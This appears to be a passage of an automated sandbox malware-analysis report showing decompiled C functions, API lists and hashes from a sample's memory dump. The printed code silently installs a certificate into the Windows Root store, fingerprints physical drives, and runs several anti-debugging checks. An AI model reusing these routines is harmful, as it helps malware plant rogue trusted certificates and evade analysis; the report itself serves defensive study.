0x1001f7cc
0x1001f789
0x1001f988

APIs

CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3

Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9

CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
GetLastError.KERNEL32 ref: 1001F817
CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
_memset.LIBCMT ref: 1001F87B
CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
_memset.LIBCMT ref: 1001F8AC
_memset.LIBCMT ref: 1001F8C9
_sprintf.LIBCMT ref: 1001F91C
_sprintf.LIBCMT ref: 1001F939
CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C

Strings

Root, xrefs: 1001F7D2
%02X, xrefs: 1001F909
Software\Microsoft\SystemCertificates\Root\Certificates\%s, xrefs: 1001F92D

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
API String ID: 3311258246-1857994723
Opcode ID: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
Opcode Fuzzy Hash: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001D7E0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001D7E0(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF20(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF20(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CD70( &_v1596);
					_t94 = E1001CFA0(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}

0x1001d7e0
0x1001d7ec
0x1001d7f3
0x1001da64
0x00000000
0x1001da64
0x1001d7f9
0x1001d803
0x1001d80d
0x1001d81a
0x1001d831
0x1001d84c
0x1001d852
0x1001d871
0x1001d878
0x1001da3d
0x1001da4c
0x1001da55
0x00000000
0x1001da5f
0x00000000
0x1001da57
0x1001d87e
0x1001d888
0x1001d892
0x1001d89c
0x1001d8a6
0x1001d8b0
0x1001d8ba
0x1001d8eb
0x1001da37
0x00000000
0x1001da37
0x1001d8fa
0x1001da16
0x1001da1a
0x1001da27
0x00000000
0x1001da31
0x00000000
0x1001da29
0x1001d914
0x1001d91f
0x1001d925
0x1001d92c
0x1001d933
0x1001d93a
0x1001d941
0x1001d948
0x1001d94f
0x1001d956
0x1001d95d
0x1001d96f
0x1001d99b
0x1001d9a0
0x1001d9a5
0x00000000
0x00000000
0x1001d9ad
0x1001d9b6
0x1001d9b9
0x1001d9c2
0x1001d9ca
0x1001d9d3
0x1001d9dc
0x1001d9f0
0x1001da00
0x1001da05
0x1001da0a
0x1001da0c
0x1001da0c
0x00000000
0x1001da0a
0x00000000

APIs

_memset.LIBCMT ref: 1001D831
wsprintfW.USER32 ref: 1001D84C
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
DeviceIoControl.KERNEL32 ref: 1001D8E3
_memset.LIBCMT ref: 1001D96F
CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
CloseHandle.KERNEL32(000000FF), ref: 1001DA37

Strings

\\.\PhysicalDrive%d, xrefs: 1001D840

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 381188756-2935326385
Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001DA70, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001DA70(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018AA0(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF20(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
						E1001D040(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					CloseHandle(_v16);
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}

0x1001da70
0x1001da78
0x1001da81
0x1001dbf0
0x00000000
0x1001dbf0
0x1001da87
0x1001da8e
0x1001da95
0x1001da9f
0x1001dabc
0x1001dac2
0x1001dade
0x1001dae5
0x1001dbce
0x1001dbd4
0x1001dbda
0x1001dbe4
0x00000000
0x1001dbeb
0x00000000
0x1001dbe6
0x1001daeb
0x1001daf5
0x1001daff
0x1001db09
0x1001db21
0x1001db26
0x1001db58
0x1001db68
0x1001db85
0x1001db9d
0x1001dba2
0x1001dba7
0x1001dba9
0x1001dba9
0x1001dba7
0x1001dbb4
0x1001dbbe
0x1001dbcb
0x00000000
0x1001dbc0
0x00000000
0x1001dbc0
0x1001dbbe
0x00000000

APIs

wsprintfW.USER32 ref: 1001DABC
CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
_memset.LIBCMT ref: 1001DB21
DeviceIoControl.KERNEL32 ref: 1001DB50
_memset.LIBCMT ref: 1001DB68
CloseHandle.KERNEL32(000000FF), ref: 1001DBB4

Strings

\\.\PhysicalDrive%d, xrefs: 1001DAB0

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 1858725146-2935326385
Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001D370, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1001D370(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _v24;
				short _v540;
				char _v1564;
				long _v1568;
				long _v1572;
				intOrPtr _v1576;
				struct _OVERLAPPED* _v1580;
				struct _OVERLAPPED* _v1584;
				struct _OVERLAPPED* _v1588;
				struct _OVERLAPPED* _v1592;
				struct _OVERLAPPED* _v1596;
				struct _OVERLAPPED* _v1600;
				struct _OVERLAPPED* _v1604;
				void _v1608;
				void* __ebp;
				int _t63;
				void* _t64;
				int _t76;
				void* _t77;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_v12 = 0;
				_v16 = _a4;
				_v1584 = 0;
				_v1580 = 0;
				do {
					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
					_t99 = _t99 + 0xc;
					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
					if(_v24 != 0xffffffff) {
						_v1572 = 0;
						_v1608 = 0;
						_v1604 = 0;
						_v1600 = 0;
						_v1596 = 0;
						_v1592 = 0;
						_v1588 = 0;
						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
						__eflags = _t63;
						if(_t63 != 0) {
							_t64 = L1000CE56(_t77,  &_v1608, _t96, _t97, 0x221);
							_t100 = _t99 + 4;
							_v8 = _t64;
							 *((char*)(_v8 + 0xa)) = 0xec;
							_v1568 = 0;
							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
							if(__eflags == 0) {
								L10:
								CloseHandle(_v24);
								_push(_v8);
								E1000CA30(_t77, _t96, _t97, __eflags);
								_t99 = _t100 + 4;
								__eflags = _v1584;
								if(_v1584 == 0) {
									_v12 = _v1580;
									goto L13;
								}
								break;
							}
							_v20 = 0;
							do {
								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
								_v20 = _v20 + 1;
								__eflags = _v20 - 0x100;
							} while (_v20 < 0x100);
							_v1576 = E1001CD70( &_v1564);
							_t76 = E1001CFA0(_v1576, 0x104, _v16);
							_t100 = _t100 + 0x10;
							__eflags = _t76;
							if(__eflags == 0) {
								_v1584 = 1;
							}
							goto L10;
						}
						goto L13;
					}
					L13:
					_v12 =  &(_v12->Internal);
					_v1580 = _v12;
				} while (_v12 < 4);
				return _v1584;
			}

0x1001d370
0x1001d370
0x1001d370
0x1001d379
0x1001d383
0x1001d386
0x1001d390
0x1001d39a
0x1001d3aa
0x1001d3b0
0x1001d3cf
0x1001d3d6
0x1001d3dd
0x1001d3e7
0x1001d3f1
0x1001d3fb
0x1001d405
0x1001d40f
0x1001d419
0x1001d442
0x1001d448
0x1001d44a
0x1001d456
0x1001d45b
0x1001d45e
0x1001d464
0x1001d468
0x1001d499
0x1001d49b
0x1001d506
0x1001d50a
0x1001d513
0x1001d514
0x1001d519
0x1001d51c
0x1001d523
0x1001d52d
0x00000000
0x1001d52d
0x00000000
0x1001d525
0x1001d49d
0x1001d4a4
0x1001d4b2
0x1001d4bf
0x1001d4c2
0x1001d4c2
0x1001d4da
0x1001d4f0
0x1001d4f5
0x1001d4f8
0x1001d4fa
0x1001d4fc
0x1001d4fc
0x00000000
0x1001d4fa
0x00000000
0x1001d44c
0x1001d530
0x1001d536
0x1001d53c
0x1001d542
0x1001d555

APIs

wsprintfW.USER32 ref: 1001D3AA
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D3C9
DeviceIoControl.KERNEL32 ref: 1001D442

Strings

\\.\PhysicalDrive%d, xrefs: 1001D39E

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ControlCreateDeviceFilewsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 3081802084-2935326385
Opcode ID: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
Instruction ID: c19dd4f4148ea860b5569224362e113c716c363f4a93641ea984967bd2cc70da
Opcode Fuzzy Hash: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
Instruction Fuzzy Hash: E9513EB4D00318ABEB10DF94DC95BDEB7B5EB84304F108198E509AB280D7B6AA94CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000EFFC, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1000EFFC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x103322d8; // 0xabce99ef
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10333a58 = _t6;
				 *0x10333a54 = _t22;
				 *0x10333a50 = _t25;
				 *0x10333a4c = _t21;
				 *0x10333a48 = _t27;
				 *0x10333a44 = _t26;
				 *0x10333a70 = ss;
				 *0x10333a64 = cs;
				 *0x10333a40 = ds;
				 *0x10333a3c = es;
				 *0x10333a38 = fs;
				 *0x10333a34 = gs;
				asm("pushfd");
				_pop( *0x10333a68);
				 *0x10333a5c =  *_t31;
				 *0x10333a60 = _v0;
				 *0x10333a6c =  &_a4;
				 *0x103339a8 = 0x10001;
				_t11 =  *0x10333a60; // 0x0
				 *0x1033395c = _t11;
				 *0x10333950 = 0xc0000409;
				 *0x10333954 = 1;
				_t12 =  *0x103322d8; // 0xabce99ef
				_v812 = _t12;
				_t13 =  *0x103322dc; // 0x54316610
				_v808 = _t13;
				 *0x103339a0 = IsDebuggerPresent();
				_push(1);
				E10013A5E(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10023b34);
				if( *0x103339a0 == 0) {
					_push(1);
					E10013A5E(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x1000effc
0x1000effc
0x1000effc
0x1000effc
0x1000effc
0x1000effc
0x1000effc
0x1000f002
0x1000f004
0x1000f004
0x10016115
0x1001611a
0x10016120
0x10016126
0x1001612c
0x10016132
0x10016138
0x1001613f
0x10016146
0x1001614d
0x10016154
0x1001615b
0x10016162
0x10016163
0x1001616c
0x10016174
0x1001617c
0x10016187
0x10016191
0x10016196
0x1001619b
0x100161a5
0x100161af
0x100161b4
0x100161ba
0x100161bf
0x100161cb
0x100161d0
0x100161d2
0x100161da
0x100161e5
0x100161f2
0x100161f4
0x100161f6
0x100161fb
0x1001620f

APIs

IsDebuggerPresent.KERNEL32 ref: 100161C5
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
TerminateProcess.KERNEL32(00000000), ref: 10016208

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
Instruction ID: 7a4982afc0af0121ee83e1bbc930dedb521e4c826244c77e9c1cc9287b5788a2
Opcode Fuzzy Hash: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
Instruction Fuzzy Hash: 0A21CCB4901264EFE700DF29DCC86447BA8FB88311F50D11AE98D8AB62E7B499C5CF02

Uniqueness

Uniqueness Score: -1.00%

Function 1001A0F0, Relevance: 6.0, APIs: 4, Instructions: 36
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A0F0(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				void* _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_v28 = CreateMutexA( &_v40, 0, _a4);
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}

0x1001a0f6
0x1001a0fd
0x1001a10a
0x1001a11a
0x1001a120
0x1001a127
0x1001a131
0x1001a144
0x1001a14b
0x1001a15a
0x1001a15a
0x1001a167

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
CreateMutexA.KERNEL32(0000000C,00000000,10020584), ref: 1001A13E
GetLastError.KERNEL32 ref: 1001A14D

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
String ID:
API String ID: 4085719312-0
Opcode ID: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
Instruction ID: 94a843d0d969dde2b410f28b1faa04b0eb5ecf9004c44cc09fbfa4c27db3ef7e
Opcode Fuzzy Hash: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
Instruction Fuzzy Hash: 5A01BF70900309DFEB10DF90C999BDEBBB4EB08705F604504E605B6290D7B59A85CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 10019FF0, Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10019FF0(void* __ecx) {
				char _v8;

				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx);
				return _v8;
			}

0x10019fff
0x1001a00b

APIs

GetCurrentProcess.KERNEL32(00000001,?,?,1001A032,?,?,1001A0C0), ref: 10019FF8
CheckRemoteDebuggerPresent.KERNEL32(00000000,?,?,1001A032,?,?,1001A0C0), ref: 10019FFF

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: CheckCurrentDebuggerPresentProcessRemote
String ID:
API String ID: 3244773808-0
Opcode ID: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
Instruction ID: 1968f35720b6d0cf004a0d8eaef2a233a09a3f8537d50a9d5b5f9af22a971398
Opcode Fuzzy Hash: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
Instruction Fuzzy Hash: DDC0127680020CBBCB00DBE0CC8C88AB7ACEA08211B200185F909C3200DA32AA088AA4

Uniqueness

Uniqueness Score: -1.00%

Function 10019E10, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019E10() {
				long _v8;
				signed int _v12;
				intOrPtr _v16;

				_v16 = 0;
				_v8 = GetVersion();
				_v12 = _v8 & 0xff;
				if(_v12 != 5) {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x40));
				} else {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0xc));
				}
				return 0 | _v16 != 0x00000002;
			}

0x10019e16
0x10019e23
0x10019e3a
0x10019e41
0x10019e60
0x10019e43
0x10019e4f
0x10019e4f
0x10019e6f

APIs

GetVersion.KERNEL32 ref: 10019E1D

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: adfc0306beaa4e93bce03fc5c6cbb84a221f21c6f70736ffbd3c40d490348e14
Instruction ID: 0347c6b33af00016a7def7ac0ecf7e1c9fc6b2e2b9c69edce8547b571e002202
Opcode Fuzzy Hash: adfc0306beaa4e93bce03fc5c6cbb84a221f21c6f70736ffbd3c40d490348e14
Instruction Fuzzy Hash: DCF0627AE04259EFCB10CFA8C485BACBBF0FB08710F0180B9E8059B710D2389A84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 10019E70, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019E70() {
				long _v8;
				signed int _v12;
				intOrPtr _v16;

				_v16 = 0;
				_v8 = GetVersion();
				_v12 = _v8 & 0xff;
				if(_v12 != 5) {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x44));
				} else {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x10));
				}
				return 0 | _v16 != 0x00000000;
			}

0x10019e76
0x10019e83
0x10019e9a
0x10019ea1
0x10019ec0
0x10019ea3
0x10019eaf
0x10019eaf
0x10019ecf

APIs

GetVersion.KERNEL32 ref: 10019E7D

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: dbb0e094891841cc3e86269b2493686aad3c3c7f70f8214e3147c2cdc3d54053
Instruction ID: a3e08d183ecbf4fa6e5f526f8af035818782452fc61373937d715c3ea2f5b76d
Opcode Fuzzy Hash: dbb0e094891841cc3e86269b2493686aad3c3c7f70f8214e3147c2cdc3d54053
Instruction Fuzzy Hash: E2F0F475E44259DFC710DFA9C585BACB7F0EB04701F1184A5E8019B751D238DA84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001A010, Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A010() {

				return IsDebuggerPresent();
			}

0x1001a01a

APIs

IsDebuggerPresent.KERNEL32(?,1001A029,?,?,1001A0C0), ref: 1001A013

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
